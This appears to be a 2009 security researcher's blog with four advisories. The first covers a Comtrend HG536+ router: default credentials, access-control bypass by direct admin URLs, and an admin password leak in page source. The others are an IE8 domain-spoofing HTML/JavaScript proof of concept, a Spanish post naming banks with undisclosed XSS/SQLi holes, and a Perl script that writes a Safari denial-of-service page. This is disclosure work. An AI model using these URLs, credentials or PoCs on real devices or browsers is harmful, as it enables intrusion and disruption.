Comtrend HG536+ vulnerabilities

Monday, April 27, 2009
##########################################
Comtrend HG536+ vulnerabilities
Vendor url:www.comtrend.com
Advisore Url:http://lostmon.blogspot.com/2009/04/
comtrend-hg536-vulnerabilities.html
Vendor notify: NO
#########################################

These Flaws are discovered before by Isecauditors
see http://www.securityfocus.com/bid/32975

sorry for the inconvenience...
#####################
Description By vendor
#####################

The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.

################
Vulnerabilities
################

this device is by default with this settings:

==========================================
l LAN port IP address: 192.168.1.1
l Local administrator account name: admin
l Local administrator account password: admin
l Local non- administrator account name: user
l Local non- administrator account password: user
l Remote WAN access: disabled
l Remote WAN access account name: support
l Remote WAN access account password: support
l NAT: enable and firewall: disable
l DHCP server on LAN interface: enable
l WAN IP address: none
============================================

All Of this flaws are because the access control
is based in a ineffective javascript control in
'menuBcm.js' file that enables or disables view
items in the menu.html file, according of user
was logged in.

For this reason a minimal user , can call directly
all pages,that are parts of the web interface
bypassing the "pseudo restrictions" access role.

for exploit all flaws , a minimal account credentials
are required.

Vuln 1 => access Control error

if a user has access to non administrator user
by entering username "user" and password "user"
with this user only can update the firmware , manage
SNMP ,and view some status in the router ,and do
diagnostics , about adsl connectivity.This user
aparently is "restricted" to take some actions.

This router in this firmware version , has a
access control error and a user without privileges
( user-user) can access to all functions if he
make a direct request to the interested file or
functions.

example :

this user has no access to manage the setup of router
but by entering http://192.168.1.1/wancfg.cmd
he can configure the WAN settings.

download the config =>
http://192.168.1.1/backupsettings.html

view wireless key =>
http://192.168.1.1/wlsecurity.html



Vuln 2 => clear text admin passwords disclosure.

login in the router with user -user account
and open http://192.168.1.1/password.html
try to view the source code...

in the source we found :

=======================
pwdAdmin = 'admin';
pwdSupport = 'support;
pwdUser = 'user';
=======================


###############
versions
###############

Comtrend HG536+
firmware A101-302JAZ-C03_R14.A2pB021g.d15h

##############
Solution
#############

No solution was available at this time.

by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN.

configure to deny Wan connections and
Grant access to device ,only to trust users.

################# €nd #############
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff

Thursday, March 05, 2009
###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################


Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)

#################
Proof of concept
#################

<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>

<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>

</html>

#######################################

Thnx To estrella to be my ligth
Thnx to all Lostmon Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Entidades bancarias españolas ante el phishing II

Saturday, February 21, 2009
#######################################
Entidades bancarias españolas ante el phishing II
#######################################

Este articulo es una segunda parte de este otro:

La banca española ante el phishing

Despues del estudio realizado sobre el estado
de la banca española ante el phishing,me gustaria
decir como ha sido la relacion y que ha pasado
despues de ese articulo.

Se ha intentando notificar a las entidades afectadas
Los problemas encontrados en sus webs , atraves de los
cuales atacantes remotos podrian intentar lanzar ataques
de phishing sobre las mimas webs de estas entidades.

Para la decepcion general,ha sido una minoria de las
entidades afectadas las que han contentado o se han
interesado por saber algunoslos posibles puntos flacos
de sus webs.

No se les ha pedido nada mas que parchearan sus webs
y se les ha ofrecido ayuda y orientacion ,asi como
el reporte de todos las vulnerabilidades encontradas,
y siendo todo esto ofrecido sin ningun animo de lucro.

En vista del poco interes prestado, lo mas logico es
poner una señal de stop y hacer una reflexion seria
sobre si tan seguros son los servicios que nos ofrecen
como se empeñan en mostrarnos en sellos y sellos de calidad
y garantia.

Casi todos suelen escudarse en que por falta de tiempo se
sacan a produccion partes o proyectos que no han sido aun
bien probados o testeados a fondo....

No deberian Antes de hacer eso , testear y retestear , para
no poner en peligro otras partes dela web?.

No revelo las vulnerabilidades por motivos obvios
aunque si podeis ver unas capturas como prueba del
concepto(he borrado la informacion destacada de las URL)
y dire que pero entre ellas se haya una muy grave la cual
la entidad afetada deberia correjir cuanto antes;
pues permite la inclusion de todo un sitio web
bajo un frame en su dominio, las demas son agujeros
xss y sql injection , asi como algun escape de
informacion suficiente para lanzar un aatque de tipo
ingenieria social.

Me dejo dos en el tintero que son las que parecen
dispuestas aparchear y merecen su tiempo para ello
al menos por el interes prestado.

Las entidades afectadas son :

##############
servicaixa
##############

http://www.servicaixa.com



###########
sa nostra
###########

www.sanostra.es



###############
caixa sabadell
###############

http://www.caixasabadell.com


Esta entidad Ya ha solucionado Sus Dos
agujeros y vuelve a ser segura en esos puntos.

##################
caixa manresa
##############

http://www.caixamanresa.es


###########
caja duero
###########

https://www.cajaduero.es


###########
cajasol
###########

http://www.cajasol.es


##############
deutsche-bank
###############

http://www.deutsche-bank.es

#####################
kutxa.net
####################

http://www.kutxa.net


se les notifico un agujero xss
concretamente un XSS persistente
y este ha sido ya pacheado.

###########
Banesto
############

http://www.banesto.es


###################
banco santander:
###################

https://www.bancosantander.es


###########
cajastur
###########

http://www.cajastur.es



################€nd###################

--

atentamente:
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group:http://groups.google.com/group/lostmon (new)
--

La curiosidad es lo que hace mover la mente....

Safari 3.2.1 for windows SafariURL protocol Handler abusse(null Deference)

Saturday, January 31, 2009
##############################################
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendor:http://www.apple.com
original advisore:http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
vendor notify:YES Exploit available: Private
##############################################

This article is a "second" part of :
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html

Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.

The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.

In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://../ or SafariURL://http://../ or
ftp://../ and wen try to open it whith safari,safari opens a new
windows , and wen we try to close this new one,clicking in the
'X' the window is closed, but it reopens again ...

sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:

######################
Part of code affected
######################

CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
CFRelease(safariURL);
return safariBundle; }

###############################

Simple PoC


################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
#[http://lostmon.blogspot.com]


$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Uso: $0 <archivo.html>\n";

}

$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http ,safariurl and ftp URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or this other =><a href=\SafariURL://"http://./\">Safari Die()</a>
<br>
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a href=\SafariURL://"ftp://./\">Safari Die()</a>
";
$piepag = "</body></html>";

$datos = $cabecera . $codigo . $piepag;

open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);

exit;

############################################


I don´t know if it has remote code execution, or other
i make SEVERAL test and only can cause a DoS ,
i don´t know if we can change NSBundle...

this issue with SafariURL can exploit across other browsers.
wen open the link with other browsers it executes safari.exe -url [link]

Thnx To estrella to be my ligth
Thnx to all Lostmon Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends